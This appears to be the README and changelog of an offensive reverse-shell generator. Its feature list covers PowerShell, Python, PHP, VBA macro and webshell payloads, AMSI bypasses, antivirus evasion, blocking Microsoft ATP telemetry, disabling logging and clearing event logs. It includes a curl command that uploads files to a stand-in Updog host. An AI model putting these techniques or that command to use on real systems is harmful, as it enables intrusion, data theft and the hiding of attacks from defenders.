A script for generating common revshells quickly and easily.
Especially nice when you need PowerShell and Python revshells, which can be a PITA to get correctly formatted.
- Shows username@computer.(domain) above the prompt and working directory
- Has a partial AMSI bypass that makes some things a bit easier, like loading a full AMSI bypass.
- TCP, UDP and SSL shells
- New custom TCP revshell!
- New custom SSL revshell!
- Reflective loading theart42's amazing Sharpcat!
- Windows PowerShell and PowerShell Core
- Functions for uploading and downloading files. (Using Updog by sc0tfree)
- ngrok can be started/stopped from inside the script
- payloads will be generated with the ngrok addresses
- you can start/stop Updog from inside the script
- The PowerShell revshells have upload/download functions embedded
- To upload from nix using curl:
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
To install Shellz:
git clone https://github.com/4ndr34z/shells
netcat, rlwrap, jq, basenc (coreutils)
updog, ngrok, xclip
- Listener started in new window. (Optional on Linux)
- PowerShell: Added option for reflective loading Sharpcat
- PowerShell: New custom SSL shell
- PowerShell: Added options for choosing TCP/UDP/SSL
- PowerShell/OpenSSL: Defaulting to correct listener when using SSL
- Updated installer to use wrapper-script (remember to delete /usr/local/bin/shells when upgrading from < 1.5.8)
- PowerShell: Built a unique TCP revshell that does not use Net.Sockets.TCPClient
- PowerShell: Remote error messages are now properly displayed
- PHP: added options and more payloads
- Added option on other payloads for changing shell
- PowerShell: Fixed the NIX payload
- PowerShell: Updated the payload for reflective loading C#
- PowerShell: Added options for payload in menu.
- PowerShell: Changed revshell for bypassing more AV vendors
- PowerShell: Added firewall rule, preventing MS ATP from phoning home (if the running user has access)
- PowerShell: Updated VBA (MS Office Macros)
- PowerShell: Disabling scriptblock logging and CheckSuspiciousContent
- PowerShell: Clears PowerShell eventlogs (if the running user has access)
- PowerShell: Added VBA payloads for MS Office Macros
- Added some node.js payloads
- Added a simple C# shell.
- Added payload for reflective loading the C# shell into memory. (Needs full AMSI bypass)
- Covering this by adding Rastamouse's full AMSI Bypass
- PowerShell: You can automatically upload and run full AMSI bypass. The partial AMSI bypass makes this possible.
- C# Shell: Automatically upload and run full AMSI bypass before loading it into memory
- Updog and ngrok status showing in every menu
- Sometimes less is more. Removed the obfuscation on TCP/UDP PowerShell revshells, because it actually triggers AV more than it bypasses, and the payload got really big :-) Still using randomization.
- Added webshells (ASPX, PHP, JSP)
- Added 2 C++ revshell binaries for Windows 32 and 64 bit.
- Fixed the handling of starting/stopping Updog
- Added Updog support
- Added Netcat binaries.
- PowerShell: Created upload/download functionality (upload requires Updog for receiving files)
- Added more information about running ngrok and Updog.
- PowerShell: Added a new "mini AMSI bypass". (It is a partial bypass.) Based on Matt Graeber's reflection method
- PowerShell: Added an "upload" function in the PowerShell reverse shell
- Removed AMSI. Not tested enough :-)
- Added AMSI bypass for the PowerShell payloads
- Fixed bug when setting port
- Changed default port to 443
- PowerShell: obfuscated some more
- PowerShell: Minor changes to the UDP payload
- Using only native nc on macOS, because the one from Homebrew doesn't work with incoming UDP
- PowerShell: Added UDP payloads
- PowerShell: Added more payloads
- PowerShell: Added some randomization and obfuscation for the payload
- PowerShell: Using UTF8 encoding in payload
- Fixed bug in Python revshell
- Added awk
- Added Bash UDP
- Added Windows Python revshells
- Added an ngrok running status
- Hiding ngrok choice if not installed
- Fixed the install options: not doing default option when pressing enter without making a choice
- Added an install script
- Added install options for checking and installing missing dependencies
- Added a couple of PHP shells
- Added shells for: Ruby, Perl, Telnet and zsh
- Added copy to clipboard using pbcopy on macOS
- Added info about listening netcat, as the macOS version doesn't display that
- Added looping netcat shells. Calls back every 10 seconds. Great in case you lose your shell
- Added check for netcat (GNU netcat 0.7.0, Homebrew) when running on macOS